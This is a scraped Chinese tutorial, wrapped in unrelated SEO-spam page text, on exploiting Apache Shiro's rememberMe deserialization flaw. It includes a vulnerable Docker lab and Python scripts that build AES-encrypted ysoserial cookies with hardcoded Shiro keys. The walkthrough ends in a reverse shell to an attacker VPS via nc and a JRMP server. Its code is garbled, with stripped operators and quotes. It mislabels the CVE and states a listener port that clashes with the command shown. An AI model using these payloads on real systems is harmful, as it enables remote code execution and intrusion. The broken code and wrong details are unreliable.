当前位置: 首页 > news >正文

淘宝推广网站怎么建设快递公司网页模板

淘宝推广网站怎么建设,快递公司网页模板,网站优化的核心不包括,做图软件ps下载网站有哪些内容一、shiro描述 Apache Shiro是一个强大且易用的Java安全框架#xff0c;执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API#xff0c;可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序 二、漏洞原理 AES加密的密钥Key被硬…一、shiro描述 Apache Shiro是一个强大且易用的Java安全框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序 二、漏洞原理 AES加密的密钥Key被硬编码在代码里Shiro是开源软件意味着每个人通过源代码都能拿到AES加密的密钥。因此攻击者构造一个恶意的对象并且对其序列化AES加密base64编码后作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化最终造成反序列化漏洞 三、影响范围 Apache Shiro 1.2.4 四、判断是否使用shiro框架 使用BP抓包未登陆的情况下请求包的cookie中没有rememberMe字段返回包set-Cookie里也没有deleteMe字段 登陆失败的话不管勾选RememberMe字段没有返回包都会有rememberMedeleteMe字段 如果以上没有返回remembeMe字段还可以尝试在请求包中的cookie中加入 rememberMe1来查看返回包是否有rememberMedeleteMe字段 五、漏洞复现CVE-2019-12422 1、搭建环境 获取docker镜像 docker pull medicean/vulapps:s_shiro_1 重启docker systemctl restart docker 启动docker镜像 docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1 2、工具使用 反弹shell 3、手动测试 ①验证漏洞是否存在 dnslog申请一个临时域名 使用python脚本生成检测payload(dns解析) import sys import base64 import uuid from random import Random import subprocess from Crypto.Cipher import AESdef encode_rememberme(command):popen subprocess.Popen([java, -jar, ysoserial-master-SNAPSHOT.jar, URLDNS, command], stdoutsubprocess.PIPE)BS AES.block_sizepad lambda s: s ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key kPHbIxk5D2deZiIxcaaaA#key Z3VucwAAAAAAAAAAAAAAAA#key wGiHplamyXlVB11UXWol8gmode AES.MODE_CBCiv uuid.uuid4().bytesencryptor AES.new(base64.b64decode(key), mode, iv)file_body pad(popen.stdout.read())base64_ciphertext base64.b64encode(iv encryptor.encrypt(file_body))return base64_ciphertextif __name__ __main__:payload encode_rememberme(sys.argv[1]) with open(payload.cookie, w) as fpw:print(rememberMe{0}.format(payload.decode()),filefpw) python shiro.py http://0tyl0a.dnslog.cn 把刚刚生成的payload.cookie粘贴到包里burp发包查看dnslog是否存在dns解析记录 ②漏洞利用 VPS监听端口3333 nc -lvvp 1234 构造反弹shell命令并且进行base64编码 在VPS开启一个JRMP(端口设置1099) 使用s.py构造payload使存在shiro反序列化的服务器 import sys import uuid import base64 import subprocess from Crypto.Cipher import AESdef encode_rememberme(command):popen subprocess.Popen([java, -jar, ysoserial-master-SNAPSHOT.jar, JRMPClient, command], stdoutsubprocess.PIPE)BS AES.block_sizepad lambda s: s ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key base64.b64decode(kPHbIxk5D2deZiIxcaaaA)iv uuid.uuid4().bytesencryptor AES.new(key, AES.MODE_CBC, iv)file_body pad(popen.stdout.read())base64_ciphertext base64.b64encode(iv encryptor.encrypt(file_body))return base64_ciphertextif __name__ __main__:payload encode_rememberme(sys.argv[1]) print(rememberMe{0}.format(payload.decode())) 截获数据包加入payload 反弹shell成功
http://www.zqtcl.cn/news/30026/

相关文章:

  • 网站建设的文案宁波网站优化建站公司
  • 做设计必看十大网站虚拟主机评测
  • 成都哪家做网站比较好自己如何建立网站
  • 做书的封面网站怎么找项目
  • 网站后台如何上传图片外贸响应式网站设计
  • 建站节高端品牌衣服有哪些牌子
  • 网站设计论坛网址搜索器
  • 做网站线稿软件有哪些湛江人才网
  • 交互网站图通信建设网站
  • 网站建设丨金手指排名15网站适配移动端和PC端
  • 大庆网站开发汽车网页
  • 建立网站需要哪些东西网站建设设备
  • 做一小说网站要花多钱山东建设厅网站是什么
  • 北京燕化工程建设有限公司网站福田欧辉氢燃料电池客车
  • 如何分析一个网站的用户网站统计代码怎么添加
  • 池州商城网站开发做网站需要备案么
  • 十度公司做网站怎么样绍兴建设网站
  • 网站统计热力图展览展示设计有限公司
  • 网站图片有什么要求房地产门户网站建设
  • 南昌市 做网站的公司嘉兴网页设计
  • 个人电子邮件注册网站申请长沙手机网站首页设计公司
  • 本溪北京网站建设alisql wordpress
  • 深圳网站建设制作优化苏州网页制作招聘
  • 最专业的企业营销型网站建设公司南皮做网站
  • 网站设计顺德青岛网站建设机构
  • 门户网站的基本特征a信息与服务网页制作简明教程
  • 广州传业建设有限公司网站网站开发成本核算及账务处理
  • 内蒙古高等级公路建设开发有限责任公司网站青白江建设局网站
  • 松江 网站建设公司手机上装修设计软件
  • 网站开发网络公六安钢铁吧